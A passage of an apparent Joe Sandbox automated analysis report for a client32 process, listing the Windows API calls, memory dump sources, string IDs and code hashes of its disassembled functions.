                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 689D0BB8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 689D0BCB
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AddressAllocateErrorFreeLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                                                                                                                    • API String ID: 391256485-2359281783
                                                                                                                                                                                                    • Opcode ID: 6cab7b1a50fa103ef74e110fd61ebf4644dcb6e808db8d67c5f31d5801a8050e
                                                                                                                                                                                                    • Instruction ID: 461a280e7eefa616cf7124f9fd01790bbcf33012105dc585173cc65131a07bfb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cab7b1a50fa103ef74e110fd61ebf4644dcb6e808db8d67c5f31d5801a8050e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A4B6500B019BD7249B759D84E1B77EC9F95608740C82CF96ACB600EB39E442C728
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153583
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 111535AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InvalidateRectUpdateWindow
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1236202516-2830328467
                                                                                                                                                                                                    • Opcode ID: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction ID: b7b16df5a43d60f3fda019c1a35b497fb37b7041778627a412a7a8a3ae26887c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6201A4B9B24716ABD2A5D761DC81F8AF364BF8572CF144828F1BB17580EA70F8808795
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                                                                    • Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetPropA.USER32(?,NSMCobrProxy), ref: 1105D150
                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 1105D168
                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 1105D17C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DestroyProcProp
                                                                                                                                                                                                    • String ID: NSMCobrProxy
                                                                                                                                                                                                    • API String ID: 3223085693-3894016192
                                                                                                                                                                                                    • Opcode ID: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                                                                                    • Instruction ID: 9c147f281cd98425ab9aa3ac9592e9bc4489785d07665bec5873f0907dac8d8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0A0367011287BE7019E49DC84DFF7BACDBC6362B008066FA02C3241D7709812D7B1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000000E), ref: 110ED4E2
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000000C), ref: 110ED4E9
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                                                                                                    • API String ID: 2713834284-4292231205
                                                                                                                                                                                                    • Opcode ID: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
                                                                                                                                                                                                    • Instruction ID: fed9dfb2ea0db9ddf34779af1484dbee49448bc6ee14c4e39e325ca65f6a5934
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BE04827B4137937E51165AA6C81FCBFB8C9B957A8F010032FB04FB282D5D16D5047D1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1319256379-1986719024
                                                                                                                                                                                                    • Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D0DB
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0E6
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                                                                    • Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                                                                                                    • Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,1107EC7B), ref: 1113F29E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                                                                                                    • API String ID: 1029625771-2314894490
                                                                                                                                                                                                    • Opcode ID: 1235e76fef71962f68239895f97bb37c0ce80ea3d24d24106cf15dfe846a22fc
                                                                                                                                                                                                    • Instruction ID: ad10c6ffd532f5eb8f2734e74a3748ffb481df7fd34b91473ff49087b70ff844
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1235e76fef71962f68239895f97bb37c0ce80ea3d24d24106cf15dfe846a22fc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D017B8602362CAEF46CFE98A88B68FEA0A34031FF949424E02487108E7348044CB12
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %dz discarded %-4u bytes: %s, xrefs: 110710FC
                                                                                                                                                                                                    • %02x , xrefs: 110710DD
                                                                                                                                                                                                    • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 110713A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
